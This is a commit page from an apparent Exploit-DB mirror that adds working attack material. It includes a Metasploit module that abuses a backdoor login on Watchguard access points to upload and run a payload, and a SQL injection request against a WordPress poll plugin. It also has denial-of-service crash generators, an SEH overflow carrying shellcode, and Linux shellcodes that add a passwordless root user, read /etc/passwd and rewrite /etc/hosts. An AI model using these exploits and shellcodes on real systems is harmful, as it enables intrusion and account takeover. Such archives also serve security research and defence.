bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-09-15

Browse source 
10 changes to exploits/shellcodes

CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)
InfraRecorder 0.53 - '.txt' Denial of Service (PoC)
Faleemi Plus 1.0.2 - Denial of Service (PoC)

Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)
Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)
Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection

Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)
Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)
Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
This commit is contained in:
Offensive Security 2018-09-15 05:01:52 +00:00
parent 2785d40187
commit c1b7aa12fc
12 changed files with 666 additions and 0 deletions
exploits
linux/webapps
45409.rb
php/webapps
45411.txt
windows_x86-64/dos
45410.py45414.py
windows_x86
dos
45413.py
local
45412.py
files_exploits.csvfiles_shellcodes.csv
shellcodes/linux_x86
45415.c45416.c45417.c45418.c

142
exploits/linux/webapps/45409.rb Executable file
View file

@ -0,0 +1,142 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Watchguard AP Backdoor Shell',
'Description' => 'Watchguard AP\'s have a backdoor account with known credentials. This can be used to
gain a valid web session on the HTTP administration interface. The administrator
can then upload a shell directly to the web root to execute it.
This module can also be used if you have legitimate access credentials to the device.',
'References' =>
[
['CVE', 'CVE-2018-10575'],
['CVE', 'CVE-2018-10576'],
['CVE', 'CVE-2018-10577'],
['URL', 'http://seclists.org/fulldisclosure/2018/May/12'],
['URL', 'https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy'],
],
'Author' => 'Stephen Shkardoon ', # ss23 / @ss2342
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Targets' => [ [ 'Automatic', { } ] ],
'DefaultTarget' => 0,
'Arch' => ARCH_MIPSBE,
))
register_options(
[
Opt::RPORT(443),
#Opt::SSL(true),
OptString.new('WG_USER', [ true, 'The username to authenticate as', 'admin']),
OptString.new('WG_PASS', [ true, 'The password for the specified username', '1234']),
])
end
def exploit
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => '/cgi-bin/luci/',
'headers' => {
'AUTH_USER' => datastore['WG_USER'],
'AUTH_PASS' => datastore['WG_PASS'],
},
})
if res.nil? || res.get_cookies.empty?
fail_with(Failure::NotFound, 'Unable to obtain a valid session with provided credentials')
end
# We have a valid session, so we should pull out the access credentials and find the serial number
sysauth = res.get_cookies.scan(/(sysauth=\w+);*/).flatten[0]
stok = res.redirection.to_s.scan(/;(stok=\w+)/).flatten[0]
vprint_status("Got sysauth #{sysauth}")
vprint_status("Got stok #{stok}")
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cgi-bin/luci/;#{stok}/html/Status",
'headers' => {
'AUTH_USER' => datastore['WG_USER'],
'AUTH_PASS' => datastore['WG_PASS'],
},
'cookie' => sysauth,
})
if res.nil? || res.code != 200
fail_with(Failure::NotFound, 'Unable to request serial')
end
# Pull out the serial and store it for later
# var device_serial = "20AP0XXXXXXXX";
if res.body.match(/device_serial = "(\w+)";/)
serial = $1
else
fail_with(Failure::NotFound, 'Unable to find serial in response')
end
vprint_status("Got serial #{serial}")
# Finally, upload our payloads
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-bin/luci/;#{stok}/wgupload",
'headers' => {
'AUTH_USER' => datastore['WG_USER'],
'AUTH_PASS' => datastore['WG_PASS'],
},
'cookie' => "#{sysauth}; serial=#{serial}; filename=/tmp/payload; md5sum=fail",
'data' => payload.encoded_exe,
})
if res.nil? || res.code != 205
fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
end
# Upload the lua script that executes our payload
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-bin/luci/;#{stok}/wgupload",
'headers' => {
'AUTH_USER' => datastore['WG_USER'],
'AUTH_PASS' => datastore['WG_PASS'],
},
'cookie' => "#{sysauth}; serial=#{serial}; filename=/www/cgi-bin/payload.luci; md5sum=fail",
'data' => "#!/usr/bin/lua
os.execute('/bin/chmod +x /tmp/payload');
os.execute('/tmp/payload');"
})
if res.nil? || res.code != 205
fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
end
# Remove the trigger script once we've got a shell
register_file_for_cleanup("/www/cgi-bin/payload.luci")
vprint_status("Uploaded lua script")
# Trigger our payload
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cgi-bin/payload.luci",
})
vprint_status("Requested lua payload")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
vprint_error("Failed to connect to the web server")
return nil
end
end
end

48
exploits/php/webapps/45411.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection
# Date: 2018-09-09
# Exploit Author: Ceylan Bozogullarindan
# Vendor Homepage: http://modalsurvey.pantherius.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
# Version: 1.5.7.3
# Tested on: Windows 10
# CVE: N\A
# Description
# The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter.
# PoC
# Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering.
# Answer that question.
# Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager,
# and change it with the payload showed below;
["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
# It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result
# of the query. When you make it 1=1, you should see a question from firt record.
# Therefore OR statement must be returned False.
# Step 3. Reload the page. Open the source code of the page. Search "sss_params".
# You will see the version of DB in value of sss_params parameter.
# The Request
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
# The result from source code of the page
<script type='text/javascript'>
/* <![CDATA[ */
var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"};
/* ]]> */
</script>
DB version: "10.1.36-MariaDB-1~trusty"....

27
exploits/windows_x86-64/dos/45410.py Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)
# Discovery by: Alan Baeza
# Discovery Date: 2018-09-13
# Vendor Homepage: https://cdburnerxp.se/
# Software Link: https://cdburnerxp.se/downloadsetup.exe
# Tested Version: 4.5.8.6795
# Tested on OS : Windows 10 Pro x64 es
#!/usr/bin/env python
#-*-coding: utf-8-*-
# Steps to Produce the DoS:
# 1.- Run python code : python dos.py
# 2.- Open generate.txt and copy content to clipboard
# 3.- Open CdBurnerXP
# 4.- Select option "Copy or grab disc"
# 5.- Select checkbox target "Hard disk"
# 6.- Paste ClipBoard on "File name"
# 7.- Clic Copy disc
# 8.- DoS
import socket, os, sys
buffer = "\x41" * 260
f = open ("generate.txt", "w")
f.write(buffer)
f.close()

25
exploits/windows_x86-64/dos/45414.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: Faleemi Plus 1.0.2 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-14
# Software Link: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe
# Tested Version: 1.0.2
# Tested on OS: Windows 10
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. Now click "Add Camera" and in the new
# window paste the content of "exploit.txt" into the following fields:
# "Camera name" & "DID number". Click "Add" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 2000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

26
exploits/windows_x86/dos/45413.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: InfraRecorder 0.53 - '.txt' Denial of Service (PoC)
# Date: 2018-09-14
# Exploit Author: Gionathan "John" Reale
# Version: version 0.53
# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
# Tested on: Windows 7 32bit
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name "exploit.txt".
# Start the program and click "Edit" > "Import... "
# Find the file "exploit.txt" and click "Open"
# You will see a crash!
#!/usr/bin/python
buffer = "A" * 6000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

51
exploits/windows_x86/local/45412.py Executable file
View file

@ -0,0 +1,51 @@
# Exploit Title: Free MP3 CD Ripper 2.6 - '.wma' Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-13
# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
# Tested on OS: Windows 7 32bit
# Tested Version: 2.6
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name "exploit.wma".
# Start the program and click on "Convert".
# Find the file "exploit.wma" and click "Open"
# You will see a calculator poped up.
#!/usr/bin/python
buffer = "A" * 4116
NSEH = "\xeb\x06\x90\x90"
SEH = "\x21\x21\xe4\x66"
nops = "\x90" * 8
#badchar \x00\x0a\x0d\x2f
#msfvenom calculator
buf = ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
payload = buffer + NSEH + SEH + nops + buf + pad
try:
f=open("exploit.wma","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

6
files_exploits.csv
View file

@ -6109,6 +6109,9 @@ id,file,description,date,author,type,platform,port
45398,exploits/windows/dos/45398.py,"MediaTek Wirless Utility rt2870 - Denial of Service (PoC)",2018-09-13,"Lawrence Amer",dos,windows,
45404,exploits/windows_x86-64/dos/45404.py,"TeamViewer App 13.0.100.0 - Denial of Service (PoC)",2018-09-13,"Ali Alipour",dos,windows_x86-64,
45405,exploits/linux/dos/45405.txt,"Linux 4.18 - Arbitrary Kernel Read into dmesg via Missing Address Check in segfault Handler",2018-09-13,"Google Security Research",dos,linux,
45410,exploits/windows_x86-64/dos/45410.py,"CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)",2018-09-14,"Alan Joaquín Baeza Meza",dos,windows_x86-64,
45413,exploits/windows_x86/dos/45413.py,"InfraRecorder 0.53 - '.txt' Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86,
45414,exploits/windows_x86-64/dos/45414.py,"Faleemi Plus 1.0.2 - Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86-64,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9969,6 +9972,7 @@ id,file,description,date,author,type,platform,port
45403,exploits/windows_x86/local/45403.py,"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows_x86,
45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows,
45407,exploits/linux/local/45407.txt,"Chrome OS 10820.0.0 dev-channel - app->VM via garcon TCP Command Socket",2018-09-13,"Google Security Research",local,linux,
45412,exploits/windows_x86/local/45412.py,"Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)",2018-09-14,"Gionathan Reale",local,windows_x86,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39975,3 +39979,5 @@ id,file,description,date,author,type,platform,port
45394,exploits/hardware/webapps/45394.py,"LG Smart IP Camera 1508190 - Backup File Download",2018-09-12,"Ege Balci",webapps,hardware,
45396,exploits/windows/webapps/45396.txt,"Apache Portals Pluto 3.0.0 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
45409,exploits/linux/webapps/45409.rb,"Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)",2018-09-14,"Stephen Shkardoon",webapps,linux,443
45411,exploits/php/webapps/45411.txt,"Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection",2018-09-14,"Ceylan BOZOĞULLARINDAN",webapps,php,80

Can't render this file because it is too large.

4
files_shellcodes.csv
View file

@ -908,3 +908,7 @@ id,file,description,date,author,type,platform
45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
45418,shellcodes/linux_x86/45418.c,"Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86

1 id file description date author type platform
908 45293 shellcodes/windows_x86-64/45293.c Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes) 2018-08-29 n30m1nd shellcode windows_x86-64
909 45308 shellcodes/arm/45308.c Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) 2018-08-30 Ken Kitahara shellcode arm
910 45329 shellcodes/arm/45329.c Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes) 2018-09-04 Ken Kitahara shellcode arm
911 45415 shellcodes/linux_x86/45415.c Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes) 2018-09-14 Ray Doyle shellcode linux_x86
912 45416 shellcodes/linux_x86/45416.c Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes) 2018-09-14 Ray Doyle shellcode linux_x86
913 45417 shellcodes/linux_x86/45417.c Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes) 2018-09-14 Ray Doyle shellcode linux_x86
914 45418 shellcodes/linux_x86/45418.c Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes) 2018-09-14 Ray Doyle shellcode linux_x86

80
shellcodes/linux_x86/45415.c Normal file
View file

@ -0,0 +1,80 @@
/*
# Shellcode Title: Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net
# Tested on: Linux/x86
# gcc -o poly_adduser_shellcode -z execstack -fno-stack-protector poly_adduser_shellcode.c
*/
/****************************************************
Disassembly of section .text:
08048060 <_start>:
8048060: 90 nop
8048061: 58 pop eax
8048062: 29 db sub ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 66 b9 01 04 mov cx,0x401
804806a: 51 push ecx
804806b: 5f pop edi
804806c: 53 push ebx
804806d: 6a 06 push 0x6
804806f: 58 pop eax
8048070: 48 dec eax
8048071: 68 2f 2f 70 61 push 0x61702f2f
8048076: 68 37 13 37 13 push 0x13371337
804807b: 68 73 73 77 64 push 0x64777373
8048080: 68 2f 65 74 63 push 0x6374652f
8048085: 5a pop edx
8048086: 5e pop esi
8048087: 5f pop edi
8048088: 5f pop edi
8048089: 56 push esi
804808a: 57 push edi
804808b: 52 push edx
804808c: 89 e3 mov ebx,esp
804808e: cd 80 int 0x80
8048090: 50 push eax
8048091: 5a pop edx
8048092: 92 xchg edx,eax
8048093: 89 c3 mov ebx,eax
8048095: 6a 05 push 0x5
8048097: 31 d2 xor edx,edx
8048099: 87 db xchg ebx,ebx
804809b: 6a 0c push 0xc
804809d: 58 pop eax
804809e: 5a pop edx
804809f: 92 xchg edx,eax
80480a0: 52 push edx
80480a1: 90 nop
80480a2: 68 30 3a 3a 3a push 0x3a3a3a30
80480a7: 56 push esi
80480a8: 5e pop esi
80480a9: 68 3a 3a 30 3a push 0x3a303a3a
80480ae: 68 72 30 30 74 push 0x74303072
80480b3: 48 dec eax
80480b4: 89 e1 mov ecx,esp
80480b6: 6a 01 push 0x1
80480b8: cd 80 int 0x80
80480ba: 6a 04 push 0x4
80480bc: 58 pop eax
80480bd: 83 c0 02 add eax,0x2
80480c0: cd 80 int 0x80
80480c2: 31 c0 xor eax,eax
80480c4: 40 inc eax
80480c5: cd 80 int 0x80
****************************************************/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x90\x58\x29\xdb\x31\xc9\x66\xb9\x01\x04\x51\x5f\x53\x6a\x06\x58\x48\x68\x2f\x2f\x70\x61\x68\x37\x13\x37\x13\x68\x73\x73\x77\x64\x68\x2f\x65\x74\x63\x5a\x5e\x5f\x5f\x56\x57\x52\x89\xe3\xcd\x80\x50\x5a\x92\x89\xc3\x6a\x05\x31\xd2\x87\xdb\x6a\x0c\x58\x5a\x92\x52\x90\x68\x30\x3a\x3a\x3a\x56\x5e\x68\x3a\x3a\x30\x3a\x68\x72\x30\x30\x74\x48\x89\xe1\x6a\x01\xcd\x80\x6a\x04\x58\x83\xc0\x02\xcd\x80\x31\xc0\x40\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

64
shellcodes/linux_x86/45416.c Normal file
View file

@ -0,0 +1,64 @@
/*
# Shellcode Title: Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net
# Tested on: Linux/x86
# gcc -o readfile_shellcode -z execstack -fno-stack-protector readfile_shellcode.c
*/
/****************************************************
Disassembly of section .text:
08048060 <_start>:
8048060: eb 2b jmp 804808d <call_shellcode>
08048062 <shellcode>:
8048062: 31 c0 xor eax,eax
8048064: b0 05 mov al,0x5
8048066: 5b pop ebx
8048067: 31 c9 xor ecx,ecx
8048069: cd 80 int 0x80
804806b: 89 c3 mov ebx,eax
804806d: b0 03 mov al,0x3
804806f: 89 e7 mov edi,esp
8048071: 89 f9 mov ecx,edi
8048073: 31 d2 xor edx,edx
8048075: b6 10 mov dh,0x10
8048077: cd 80 int 0x80
8048079: 89 c2 mov edx,eax
804807b: 31 c0 xor eax,eax
804807d: b0 04 mov al,0x4
804807f: 31 db xor ebx,ebx
8048081: b3 01 mov bl,0x1
8048083: cd 80 int 0x80
8048085: 31 c0 xor eax,eax
8048087: b0 01 mov al,0x1
8048089: 31 db xor ebx,ebx
804808b: cd 80 int 0x80
0804808d <call_shellcode>:
804808d: e8 d0 ff ff ff call 8048062 <shellcode>
08048092 <message>:
8048092: 2f das
8048093: 65 gs
8048094: 74 63 je 80480f9 <message+0x67>
8048096: 2f das
8048097: 70 61 jo 80480fa <message+0x68>
8048099: 73 73 jae 804810e <message+0x7c>
804809b: 77 64 ja 8048101 <message+0x6f>
****************************************************/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x2b\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\x10\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd0\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

66
shellcodes/linux_x86/45417.c Normal file
View file

@ -0,0 +1,66 @@
/*
# Title: Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Tested on: Linux/x86
# gcc -o poly_hosts_shellcode -z execstack -fno-stack-protector poly_hosts_shellcode.c
*/
/****************************************************
Disassembly of section .text:
08048060 <_start>:
8048060: 29 c9 sub ecx,ecx
8048062: 51 push ecx
08048063 <open>:
8048063: 6a 05 push 0x5
8048065: 58 pop eax
8048066: 68 6f 73 74 73 push 0x7374736f
804806b: 68 74 63 2f 68 push 0x682f6374
8048070: 68 2f 2f 2f 65 push 0x652f2f2f
8048075: 54 push esp
8048076: 5b pop ebx
8048077: 51 push ecx
8048078: 41 inc ecx
8048079: b5 04 mov ch,0x4
804807b: cd 80 int 0x80
804807d: 93 xchg ebx,eax
804807e: 6a 04 push 0x4
8048080: 58 pop eax
08048081 <write>:
8048081: 68 2e 63 6f 6d push 0x6d6f632e
8048086: 68 6f 67 6c 65 push 0x656c676f
804808b: 68 31 20 67 6f push 0x6f672031
8048090: 68 31 2e 31 2e push 0x2e312e31
8048095: 68 31 32 37 2e push 0x2e373231
804809a: 54 push esp
804809b: 59 pop ecx
804809c: 6a 14 push 0x14
804809e: 5a pop edx
804809f: cd 80 int 0x80
080480a1 <close>:
80480a1: 92 xchg edx,eax
80480a2: b0 06 mov al,0x6
80480a4: cd 80 int 0x80
080480a6 <exit>:
80480a6: 31 c0 xor eax,eax
80480a8: 40 inc eax
80480a9: cd 80 int 0x80
****************************************************/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x29\xc9\x51\x6a\x05\x58\x68\x6f\x73\x74\x73\x68\x74\x63\x2f\x68\x68\x2f\x2f\x2f\x65\x54\x5b\x51\x41\xb5\x04\xcd\x80\x93\x6a\x04\x58\x68\x2e\x63\x6f\x6d\x68\x6f\x67\x6c\x65\x68\x31\x20\x67\x6f\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x54\x59\x6a\x14\x5a\xcd\x80\x92\xb0\x06\xcd\x80\x31\xc0\x40\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

127
shellcodes/linux_x86/45418.c Normal file
View file

@ -0,0 +1,127 @@
/*
# Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net
# Tested on: Linux/x86
# gcc -o xor_encoded_shellcode -z execstack -fno-stack-protector xor_encoded_shellcode.c
*/
/****************************************************
Disassembly of section .text:
08048060 <_start>:
8048060: eb 2f jmp 8048091 <find_address>
08048062 <decoder>:
8048062: 5f pop edi
8048063: 57 push edi
8048064: 5e pop esi
08048065 <get_key>:
8048065: 8a 07 mov al,BYTE PTR [edi]
8048067: 6a 90 push 0xffffff90
8048069: 5b pop ebx
804806a: 3c aa cmp al,0xaa
804806c: 74 0a je 8048078 <decode_insertion>
804806e: 30 d8 xor al,bl
08048070 <decode_xor>:
8048070: 30 07 xor BYTE PTR [edi],al
8048072: 47 inc edi
8048073: 30 07 xor BYTE PTR [edi],al
8048075: 47 inc edi
8048076: eb ed jmp 8048065 <get_key>
08048078 <decode_insertion>:
8048078: 8d 3e lea edi,[esi]
804807a: 31 c0 xor eax,eax
804807c: 31 db xor ebx,ebx
0804807e <insertion_decoder>:
804807e: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1]
8048081: 80 f3 90 xor bl,0x90
8048084: 75 10 jne 8048096 <encoded>
8048086: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1]
804808a: 88 1f mov BYTE PTR [edi],bl
804808c: 47 inc edi
804808d: 04 02 add al,0x2
804808f: eb ed jmp 804807e <insertion_decoder>
08048091 <find_address>:
8048091: e8 cc ff ff ff call 8048062 <decoder>
08048096 <encoded>:
8048096: b7 cc mov bh,0xcc
8048098: 3d ba 0a ab f3 cmp eax,0xf3ab0aba
804809d: a3 9b bb 01 95 mov ds:0x9501bb9b,eax
80480a2: 75 d4 jne 8048078 <decode_insertion>
80480a4: bc f7 fa d9 1c mov esp,0x1cd9faf7
80480a9: 8d (bad)
80480aa: d5 1c aad 0x1c
80480ac: f7 56 73 not DWORD PTR [esi+0x73]
80480af: 31 ef xor edi,ebp
80480b1: cd a9 int 0xa9
80480b3: 34 12 xor al,0x12
80480b5: 4f dec edi
80480b6: 50 push eax
80480b7: 40 inc eax
80480b8: 71 d0 jno 804808a <insertion_decoder+0xc>
80480ba: 94 xchg esp,eax
80480bb: c4 (bad)
80480bc: f7 d7 not edi
80480be: 7f ee jg 80480ae <encoded+0x18>
80480c0: 62 (bad)
80480c1: c3 ret
80480c2: 48 dec eax
80480c3: 03 d3 add edx,ebx
